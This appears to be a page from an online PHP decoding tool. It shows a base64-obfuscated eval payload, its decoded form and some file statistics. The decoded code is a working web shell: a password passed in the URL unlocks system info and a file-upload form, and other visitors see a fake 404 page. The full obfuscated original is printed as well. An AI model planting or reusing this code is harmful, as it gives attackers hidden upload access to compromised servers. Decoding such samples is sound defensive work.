Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php eval(base64_decode('CiBnb3RvIEwzbjZUOyBnWFNtNzogaGJTY2c6IGdvdG8gcWNvbzU7IGI0VWk0OiAk..

Decoded Output download


 goto L3n6T; gXSm7: hbScg: goto qcoo5; b4Ui4: $passcode = isset($_GET["pass"]) ? $_GET["pass"] : ''; goto XiAKZ; NXNQc: KvkxM: goto sjD72; bPU08: HtG1Z: goto Sxje1; pUToC: eYvaa: goto b4Ui4; WbpVH: goto eYvaa; goto gXSm7; qcoo5: if (password_verify($passcode, $hash)) { echo "<b>...U bypass it!!</b><br>"; echo "<b>System Info:</b> " . php_uname(); echo "<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>"; if (isset($_POST["_upl"]) && $_POST["_upl"] == "Upload") { if (@copy($_FILES["file"]["tmp_name"], $_FILES["file"]["name"])) { echo "<b>Success!</b><br><br>"; } else { echo "<b>Failed!</b><br><br>"; } } } else { $domain = $_SERVER["SERVER_NAME"]; echo "<html><head><title>404 Not Found</title></head><body>"; echo "<h1>Not Found</h1>"; echo "<p>The requested URL was not found on this server.</p>"; echo "<hr>"; echo "<address>Apache/2.4.38 (Ubuntu) Server at " . $domain . " Port 443</address>"; echo "</body></html>"; } goto WfVxH; Sxje1: $hash = "$argon2id$v=19$m=65536,t=4,p=1$enBDMTV1aC5PTk5WU2RKYw$IuDVojCqCCFvnYxpBZVaNHtNA0UCzfUT//3smxkOZoA"; goto WbpVH; WfVxH: goto KvkxM; goto pUToC; L3n6T: goto HtG1Z; goto bPU08; XiAKZ: goto hbScg; goto NXNQc; sjD72: 

Did this file decode correctly?

Original Code

<?php eval(base64_decode('CiBnb3RvIEwzbjZUOyBnWFNtNzogaGJTY2c6IGdvdG8gcWNvbzU7IGI0VWk0OiAkcGFzc2NvZGUgPSBpc3NldCgkX0dFVFsiXDE2MFx4NjFcMTYzXDE2MyJdKSA/ICRfR0VUWyJcMTYwXHg2MVx4NzNceDczIl0gOiAnJzsgZ290byBYaUFLWjsgTlhOUWM6IEt2a3hNOiBnb3RvIHNqRDcyOyBiUFUwODogSHRHMVo6IGdvdG8gU3hqZTE7IHBVVG9DOiBlWXZhYTogZ290byBiNFVpNDsgV2JwVkg6IGdvdG8gZVl2YWE7IGdvdG8gZ1hTbTc7IHFjb281OiBpZiAocGFzc3dvcmRfdmVyaWZ5KCRwYXNzY29kZSwgJGhhc2gpKSB7IGVjaG8gIlx4M2NcMTQyXHgzZVw1Nlw1Nlw1NlwxMjVceDIwXDE0MlwxNzFceDcwXHg2MVx4NzNceDczXHgyMFwxNTFcMTY0XHgyMVw0MVx4M2NcNTdceDYyXHgzZVw3NFx4NjJceDcyXDc2IjsgZWNobyAiXDc0XDE0Mlw3NlwxMjNceDc5XHg3M1x4NzRcMTQ1XDE1NVw0MFwxMTFcMTU2XDE0NlwxNTdcNzJcNzRceDJmXHg2Mlx4M2VcNDAiIC4gcGhwX3VuYW1lKCk7IGVjaG8gIlw3NFwxNDZcMTU3XDE2MlwxNTVcNDBcMTQxXDE0M1wxNjRcMTUxXDE1N1x4NmVcNzVcNDJcNDJceDIwXHg2ZFwxNDVcMTY0XDE1MFx4NmZcMTQ0XDc1XHgyMlwxNjBceDZmXHg3M1x4NzRcNDJcNDBcMTQ1XHg2ZVwxNDNceDc0XHg3OVwxNjBceDY1XHgzZFx4MjJceDZkXHg3NVx4NmNcMTY0XHg2OVwxNjBceDYxXHg3MlwxNjRceDJmXDE0Nlx4NmZcMTYyXHg2ZFx4MmRcMTQ0XDE0MVx4NzRcMTQxXDQyXDQwXHg2ZVwxNDFcMTU1XHg2NVw3NVx4MjJceDc1XHg3MFx4NmNceDZmXDE0MVwxNDRceDY1XDE2Mlw0Mlw0MFx4NjlceDY0XDc1XDQyXHg3NVx4NzBceDZjXDE1N1x4NjFceDY0XHg2NVx4NzJcNDJceDNlIjsgZWNobyAiXDc0XHg2OVx4NmVceDcwXHg3NVx4NzRceDIwXDE2NFwxNzFceDcwXDE0NVx4M2RceDIyXHg2Nlx4NjlceDZjXDE0NVw0Mlx4MjBcMTU2XDE0MVwxNTVceDY1XDc1XDQyXDE0Nlx4NjlcMTU0XDE0NVx4MjJceDIwXHg3M1x4NjlceDdhXHg2NVw3NVw0Mlw2NVw2MFw0Mlx4M2VceDNjXHg2OVwxNTZceDcwXDE2NVwxNjRcNDBcMTU2XDE0MVx4NmRceDY1XDc1XDQyXHg1ZlwxNjVceDcwXDE1NFw0Mlw0MFwxNjRcMTcxXHg3MFwxNDVceDNkXDQyXHg3M1x4NzVcMTQyXHg2ZFwxNTFceDc0XDQyXDQwXDE1MVwxNDRceDNkXDQyXHg1Zlx4NzVcMTYwXHg2Y1x4MjJcNDBceDc2XHg2MVwxNTRceDc1XDE0NVx4M2RcNDJceDU1XHg3MFwxNTRceDZmXDE0MVwxNDRceDIyXHgzZVw3NFw1N1wxNDZcMTU3XHg3Mlx4NmRcNzYiOyBpZiAoaXNzZXQoJF9QT1NUWyJceDVmXHg3NVwxNjBcMTU0Il0pICYmICRfUE9TVFsiXDEzN1wxNjVceDcwXDE1NCJdID09ICJceDU1XDE2MFx4NmNcMTU3XHg2MVwxNDQiKSB7IGlmIChAY29weSgkX0ZJTEVTWyJceDY2XHg2OVwxNTRcMTQ1Il1bIlx4NzRcMTU1XHg3MFwxMzdcMTU2XDE0MVwxNTVcMTQ1Il0sICRfRklMRVNbIlx4NjZcMTUxXDE1NFx4NjUiXVsiXHg2ZVx4NjFceDZkXDE0NSJdKSkgeyBlY2hvICJcNzRcMTQyXHgzZVx4NTNcMTY1XDE0M1x4NjNceDY1XDE2M1wxNjNcNDFcNzRceDJmXDE0Mlw3Nlw3NFwxNDJcMTYyXHgzZVx4M2NceDYyXHg3Mlx4M2UiOyB9IGVsc2UgeyBlY2hvICJceDNjXDE0Mlw3Nlx4NDZcMTQxXDE1MVwxNTRceDY1XDE0NFw0MVx4M2NcNTdceDYyXHgzZVx4M2NcMTQyXHg3Mlx4M2VceDNjXDE0MlwxNjJcNzYiOyB9IH0gfSBlbHNlIHsgJGRvbWFpbiA9ICRfU0VSVkVSWyJcMTIzXDEwNVwxMjJcMTI2XDEwNVwxMjJceDVmXHg0ZVx4NDFcMTE1XHg0NSJdOyBlY2hvICJceDNjXHg2OFwxNjRceDZkXDE1NFw3Nlx4M2NcMTUwXHg2NVx4NjFcMTQ0XDc2XHgzY1x4NzRcMTUxXDE2NFx4NmNcMTQ1XDc2XDY0XDYwXHgzNFx4MjBceDRlXHg2ZlwxNjRceDIwXDEwNlwxNTdceDc1XHg2ZVwxNDRceDNjXDU3XDE2NFwxNTFceDc0XHg2Y1x4NjVceDNlXHgzY1w1N1wxNTBcMTQ1XDE0MVwxNDRcNzZceDNjXHg2Mlx4NmZceDY0XHg3OVw3NiI7IGVjaG8gIlx4M2NceDY4XDYxXDc2XDExNlwxNTdceDc0XHgyMFx4NDZcMTU3XDE2NVwxNTZcMTQ0XDc0XHgyZlwxNTBcNjFceDNlIjsgZWNobyAiXHgzY1wxNjBcNzZcMTI0XDE1MFx4NjVcNDBceDcyXHg2NVwxNjFceDc1XHg2NVx4NzNceDc0XDE0NVx4NjRceDIwXDEyNVx4NTJceDRjXDQwXHg3N1wxNDFceDczXDQwXDE1NlwxNTdcMTY0XDQwXDE0Nlx4NmZcMTY1XHg2ZVwxNDRceDIwXHg2Zlx4NmVcNDBcMTY0XHg2OFwxNTFcMTYzXDQwXDE2M1x4NjVceDcyXDE2NlwxNDVcMTYyXDU2XHgzY1w1N1x4NzBcNzYiOyBlY2hvICJcNzRcMTUwXHg3Mlw3NiI7IGVjaG8gIlw3NFwxNDFceDY0XDE0NFx4NzJcMTQ1XHg3M1x4NzNceDNlXHg0MVwxNjBcMTQxXHg2M1wxNTBceDY1XHgyZlx4MzJcNTZceDM0XDU2XDYzXDcwXDQwXHgyOFwxMjVceDYyXDE2NVx4NmVcMTY0XHg3NVw1MVw0MFwxMjNceDY1XDE2Mlx4NzZceDY1XHg3Mlx4MjBceDYxXHg3NFw0MCIgLiAkZG9tYWluIC4gIlx4MjBceDUwXHg2ZlwxNjJcMTY0XHgyMFw2NFx4MzRceDMzXDc0XDU3XHg2MVx4NjRcMTQ0XDE2MlwxNDVcMTYzXHg3M1w3NiI7IGVjaG8gIlw3NFx4MmZcMTQyXDE1N1x4NjRceDc5XDc2XHgzY1x4MmZcMTUwXHg3NFx4NmRcMTU0XHgzZSI7IH0gZ290byBXZlZ4SDsgU3hqZTE6ICRoYXNoID0gIlx4MjRcMTQxXDE2Mlx4NjdcMTU3XDE1Nlx4MzJcMTUxXHg2NFx4MjRceDc2XHgzZFw2MVx4MzlcNDRceDZkXDc1XDY2XDY1XHgzNVx4MzNcNjZcNTRcMTY0XHgzZFw2NFx4MmNceDcwXHgzZFx4MzFcNDRceDY1XDE1NlwxMDJcMTA0XHg0ZFx4NTRceDU2XHgzMVx4NjFcMTAzXDY1XDEyMFwxMjRceDZiXHgzNVx4NTdceDU1XHgzMlwxMjJceDRiXDEzMVx4NzdcNDRceDQ5XHg3NVwxMDRceDU2XHg2ZlwxNTJceDQzXHg3MVwxMDNcMTAzXDEwNlwxNjZcMTU2XHg1OVx4NzhceDcwXDEwMlwxMzJceDU2XHg2MVx4NGVceDQ4XHg3NFx4NGVceDQxXDYwXDEyNVx4NDNcMTcyXHg2Nlx4NTVcMTI0XHgyZlw1N1x4MzNcMTYzXHg2ZFx4NzhcMTUzXDExN1x4NWFceDZmXDEwMSI7IGdvdG8gV2JwVkg7IFdmVnhIOiBnb3RvIEt2a3hNOyBnb3RvIHBVVG9DOyBMM242VDogZ290byBIdEcxWjsgZ290byBiUFUwODsgWGlBS1o6IGdvdG8gaGJTY2c7IGdvdG8gTlhOUWM7IHNqRDcyOiA='));?>

Function Calls

base64_decode 1

Variables

None

Stats

MD5 6e744e542f5816dd84ff6856b3979cbf
Eval Count 1
Decode Time 50 ms